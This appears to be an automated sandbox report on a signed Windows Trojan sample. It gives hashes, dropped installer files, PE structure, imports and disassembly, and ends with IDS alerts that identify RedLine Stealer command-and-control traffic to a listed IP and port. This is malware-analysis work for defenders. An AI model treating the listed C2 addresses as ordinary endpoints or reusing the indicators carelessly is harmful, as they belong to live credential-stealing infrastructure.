                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.6890805040630776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:v8PhGuRc06WX4cnT5NQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:uhG1snT4bwqtnkCrswx
                                                                                                                                                                      MD5:8E06133FE2432E2462CA0A844D3D2B8D
                                                                                                                                                                      SHA1:044F29BD04BCEC690323E08CA70D094D5684AE3F
                                                                                                                                                                      SHA-256:48E746A1FFD2A1E79E9E57EEF48E15D55E5BD4166AD7C483FDE053C220FDF76D
                                                                                                                                                                      SHA-512:7285BE032316005F952F71190AC76BBFCC900CD7EB3D9DAB15185FCE3E32D457C29260E6153721C3B6E81298785108D0DE17BEFCB57D59C6FDD3478925A2D6F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):1.3441020181505743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:4xOuHvhPIFX4zT53DJQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:wOOIwT5ebwqtnkCrswx
                                                                                                                                                                      MD5:3B363EF691FE4A1A250A5524B6FFCA11
                                                                                                                                                                      SHA1:8D498C1CBC4805768E034AA4ABAFB3EC88751328
                                                                                                                                                                      SHA-256:FA9D2E86266999003D34B02FC618FA0CEDC1ED6A204AE655D7F72CB10943D865
                                                                                                                                                                      SHA-512:5A36E860E72825314804A2532CDA6C940BE1F966DA46CB1397056D773E863EB7DBB7F39C88794CEC8C7428939E74C24BF222D70892BA3CD53D894B0C9D28A2D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):0.09732975350377866
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKO0bu9xsZpiMtsW0FQT8KEojytOby4lSVky6lWf1:50i8n0itFzDHF0buM1MQ7tWObdzWd
                                                                                                                                                                      MD5:017120DE836CF251613B70DAE84B5F64
                                                                                                                                                                      SHA1:FBE863C57273C0AFC9427C67148D34CFD57E75B5
                                                                                                                                                                      SHA-256:CD3FD6AA4710FCE6FF0B55B9C744E9252DBD5896D604D8A50658AFDE2E022051
                                                                                                                                                                      SHA-512:800D3C9890BCE9F0A96469FB63CD8FAA46FBDC79A24AC0F43AB3A2713F7F6FC5A6F9A91F4B790F8B762AF5D35D3B330C50F341625D75F8477FBE68934F130461
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.6890805040630776
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:v8PhGuRc06WX4cnT5NQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:uhG1snT4bwqtnkCrswx
                                                                                                                                                                      MD5:8E06133FE2432E2462CA0A844D3D2B8D
                                                                                                                                                                      SHA1:044F29BD04BCEC690323E08CA70D094D5684AE3F
                                                                                                                                                                      SHA-256:48E746A1FFD2A1E79E9E57EEF48E15D55E5BD4166AD7C483FDE053C220FDF76D
                                                                                                                                                                      SHA-512:7285BE032316005F952F71190AC76BBFCC900CD7EB3D9DAB15185FCE3E32D457C29260E6153721C3B6E81298785108D0DE17BEFCB57D59C6FDD3478925A2D6F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):1.3441020181505743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:4xOuHvhPIFX4zT53DJQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:wOOIwT5ebwqtnkCrswx
                                                                                                                                                                      MD5:3B363EF691FE4A1A250A5524B6FFCA11
                                                                                                                                                                      SHA1:8D498C1CBC4805768E034AA4ABAFB3EC88751328
                                                                                                                                                                      SHA-256:FA9D2E86266999003D34B02FC618FA0CEDC1ED6A204AE655D7F72CB10943D865
                                                                                                                                                                      SHA-512:5A36E860E72825314804A2532CDA6C940BE1F966DA46CB1397056D773E863EB7DBB7F39C88794CEC8C7428939E74C24BF222D70892BA3CD53D894B0C9D28A2D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):73728
                                                                                                                                                                      Entropy (8bit):0.18410240466212366
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:hyRT2QxSKQYQs/HDDWSKQi/HDD8AEKgCykVFDVYzknb9Q:hyJqtnkCrsAb
                                                                                                                                                                      MD5:BF7CF365BF24786565D5CF97A83D0BF0
                                                                                                                                                                      SHA1:0E06119D950BB2B3CDC04242D210FE89503AC817
                                                                                                                                                                      SHA-256:5192CAB04CD31A1881587CCA3DA5245D5E9DA797B3810E43E1C3969955FA2331
                                                                                                                                                                      SHA-512:C06980AB040D4CEB4A4EA635072F4A07DB770E8D67CB9EAE651C11FA01F5D28BDE503E454CE873B7F9E9AFBF99E54666E6B78CD32461613C6E95E7CD85894340
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                      Entropy (8bit):1.3441020181505743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:4xOuHvhPIFX4zT53DJQJbyQs/HDDWSKQi/HDD8AEKgCykVFDVYzk+QxSKQbT0r:wOOIwT5ebwqtnkCrswx
                                                                                                                                                                      MD5:3B363EF691FE4A1A250A5524B6FFCA11
                                                                                                                                                                      SHA1:8D498C1CBC4805768E034AA4ABAFB3EC88751328
                                                                                                                                                                      SHA-256:FA9D2E86266999003D34B02FC618FA0CEDC1ED6A204AE655D7F72CB10943D865
                                                                                                                                                                      SHA-512:5A36E860E72825314804A2532CDA6C940BE1F966DA46CB1397056D773E863EB7DBB7F39C88794CEC8C7428939E74C24BF222D70892BA3CD53D894B0C9D28A2D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.993502133196768
TrID:
• Win32 Executable (generic) a (10002005/4) 98.81%
• Windows ActiveX control (116523/4) 1.15%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
File size:7'465'048 bytes
MD5:19124312cafa0b1c5524329755a5d6a2
SHA1:ccd8c01b210b26cd708a3e4cc49de45fed9abac1
SHA256:0190e867668e9be091e3d52261b62ef9b65059565ec17168813f82e7693af2fd
SHA512:4ffea24d0c03281afb06a23424e0a22a4407d7ce7fb80462aa8f9fa6adf4b33d5cd6e3f72943f6a1ca21cb26395922ded207605b5e95b04e9f3bd65443d98b9b
SSDEEP:98304:Uw5gk9MwZAN5CWj5QrOZAzojo6VE3re7a6fXG44ngx5fVD2InA:H5gk9KH9q4SKaSG44nUtyIA
TLSH:02769D217286C43BD56A01B1692CDA9F5228BF720B7154D7B3DC3E3F5AB48C21636E27
Icon Hash:b8868baba9aba2d8
Entrypoint:0x5d0974
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x6399D230 [Wed Dec 14 13:40:00 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:8708d1fe1b5ff509570e29ce51663405
Signature Valid:true
Signature Issuer:CN=SSL.com Code Signing Intermediate CA RSA R1, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:The operation completed successfully
Error Number:0
Not Before, Not After
• 5/19/2023 8:32:29 AM, 5/17/2024 8:32:29 AM
Subject Chain
• CN=IMPERIOUS TECHNOLOGIES LIMITED, O=IMPERIOUS TECHNOLOGIES LIMITED, L=Ringwood, C=GB
Version:3
Thumbprint MD5:C9CEC5817E76867C2EFE9D2B497007B6
Thumbprint SHA-1:21A97512A2959B0E74729BE220102AEF1DCF56FD
Thumbprint SHA-256:8ED289FCC40BBC150A52B733123F6094CCFB2C499D6E932B0D9A6001490FB7E6
Serial:3AB74A2EBF93447ADB83554B5564FE03
Instruction
call 00007FCFF102A42Bh
jmp 00007FCFF1029C5Fh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FCFF10292B3h
jmp 00007FCFF1029DC2h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [006E4020h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [006E4020h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [006E4020h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e223c | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2f1000 | 0x20bbc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x71bfd0 | 0x2888 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x312000 | 0x279d0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x288188 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x288200 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x259d50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x258000 | 0x2e8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2df5e8 | 0x260 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2565c6 | 0x256600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x258000 | 0x8b322 | 0x8b400 | False | 0.3123246745960503 | data | 4.589889619444622 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2e4000 | 0xcf40 | 0x3a00 | False | 0.2693292025862069 | data | 4.761885688726732 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2f1000 | 0x20bbc | 0x20c00 | False | 0.1356303673664122 | data | 5.260618272073059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x312000 | 0x279d0 | 0x27a00 | False | 0.4465817231861199 | data | 6.521615115365491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x2f18e0 | 0x13e | Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colors | English | United States | 0.25471698113207547
RT_BITMAP | 0x2f1a20 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 0 | English | United States | 0.03017241379310345
RT_BITMAP | 0x2f2248 | 0x48a8 | Device independent bitmap graphic, 290 x 16 x 32, image size 0 | English | United States | 0.11881720430107527
RT_BITMAP | 0x2f6af0 | 0xa6a | Device independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/m | English | United States | 0.21680420105026257
RT_BITMAP | 0x2f755c | 0x152 | Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colors | English | United States | 0.5295857988165681
RT_BITMAP | 0x2f76b0 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 0 | English | United States | 0.4875478927203065
RT_ICON | 0x2f7ed8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.16129032258064516
RT_ICON | 0x2f81c0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.32094594594594594
RT_ICON | 0x2f82e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.16463414634146342
RT_ICON | 0x2f9390 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.18565573770491803
RT_ICON | 0x2f9d18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3262411347517731
RT_DIALOG | 0x2fa180 | 0xac | data | English | United States | 0.7151162790697675
RT_DIALOG | 0x2fa22c | 0xcc | data | English | United States | 0.6911764705882353
RT_DIALOG | 0x2fa2f8 | 0x1b4 | data | English | United States | 0.5458715596330275
RT_DIALOG | 0x2fa4ac | 0x136 | data | English | United States | 0.6064516129032258
RT_DIALOG | 0x2fa5e4 | 0x4c | data | English | United States | 0.8289473684210527
RT_STRING | 0x2fa630 | 0x234 | data | English | United States | 0.4645390070921986
RT_STRING | 0x2fa864 | 0x182 | data | English | United States | 0.5103626943005182
RT_STRING | 0x2fa9e8 | 0x50 | data | English | United States | 0.7375
RT_STRING | 0x2faa38 | 0x9a | data | English | United States | 0.37662337662337664
                                                                                                                                                                      RT_STRING0x2faad40x2f6dataEnglishUnited States0.449868073878628
                                                                                                                                                                      RT_STRING0x2fadcc0x5c0dataEnglishUnited States0.3498641304347826
                                                                                                                                                                      RT_STRING0x2fb38c0x3c2dataEnglishUnited States0.35343035343035345
                                                                                                                                                                      RT_STRING0x2fb7500x100dataEnglishUnited States0.5703125
                                                                                                                                                                      RT_STRING0x2fb8500x484dataEnglishUnited States0.39186851211072665
                                                                                                                                                                      RT_STRING0x2fbcd40x1eadataEnglishUnited States0.44081632653061226
                                                                                                                                                                      RT_STRING0x2fbec00x18adataEnglishUnited States0.5228426395939086
                                                                                                                                                                      RT_STRING0x2fc04c0x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                                                                                                                                                                      RT_STRING0x2fc2640x624dataEnglishUnited States0.3575063613231552
                                                                                                                                                                      RT_STRING0x2fc8880x660dataEnglishUnited States0.3474264705882353
                                                                                                                                                                      RT_STRING0x2fcee80x2e2dataEnglishUnited States0.4037940379403794
                                                                                                                                                                      RT_GROUP_ICON0x2fd1cc0x22dataEnglishUnited States1.0
                                                                                                                                                                      RT_VERSION0x2fd1f00x2dcdataEnglishUnited States0.44672131147540983
                                                                                                                                                                      RT_HTML0x2fd4cc0x3835ASCII text, with very long lines (443), with CRLF line terminatorsEnglishUnited States0.08298005420807561
                                                                                                                                                                      RT_HTML0x300d040x1316ASCII text, with CRLF line terminatorsEnglishUnited States0.18399508800654932
                                                                                                                                                                      RT_HTML0x30201c0x52bHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.36281179138321995
                                                                                                                                                                      RT_HTML0x3025480x6acdHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10679931238798873
                                                                                                                                                                      RT_HTML0x3090180x6a2HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3486454652532391
                                                                                                                                                                      RT_HTML0x3096bc0x104aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.2170263788968825
                                                                                                                                                                      RT_HTML0x30a7080x15b1HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.17612101566720692
                                                                                                                                                                      RT_HTML0x30bcbc0x205cexported SGML document, ASCII text, with very long lines (659), with CRLF line terminatorsEnglishUnited States0.13604538870111058
                                                                                                                                                                      RT_HTML0x30dd180x368dHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10834228428213391
                                                                                                                                                                      RT_MANIFEST0x3113a80x813XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.41025641025641024
DLL | Import
KERNEL32.dll | CreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, MoveFileW, GetLastError, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateProcessW, GetExitCodeProcess, GetWindowsDirectoryW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, LocalFree, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, LocalAlloc, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, GetProcessAffinityMask, GetModuleHandleA, GlobalMemoryStatus, ReleaseSemaphore, CreateSemaphoreW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/21/23-19:35:51.013900 | TCP | 2046105 | ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
08/21/23-19:35:51.481894 | TCP | 2046045 | ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
08/21/23-19:35:54.924171 | TCP | 2046056 | ET TROJAN Redline Stealer Activity (Response) | 9878 | 49737 | 45.135.232.24 | 192.168.2.3
08/21/23-19:35:51.013900 | TCP | 2046045 | ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) | 49736 | 9878 | 192.168.2.3 | 45.135.232.24
08/21/23-19:35:54.854691 | TCP | 2046105 | ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) | 49737 | 9878 | 192.168.2.3 | 45.135.232.24
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 21, 2023 19:35:21.569868088 CEST | 49723 | 443 | 192.168.2.3 | 81.177.140.69
Aug 21, 2023 19:35:21.569953918 CEST | 443 | 49723 | 81.177.140.69 | 192.168.2.3
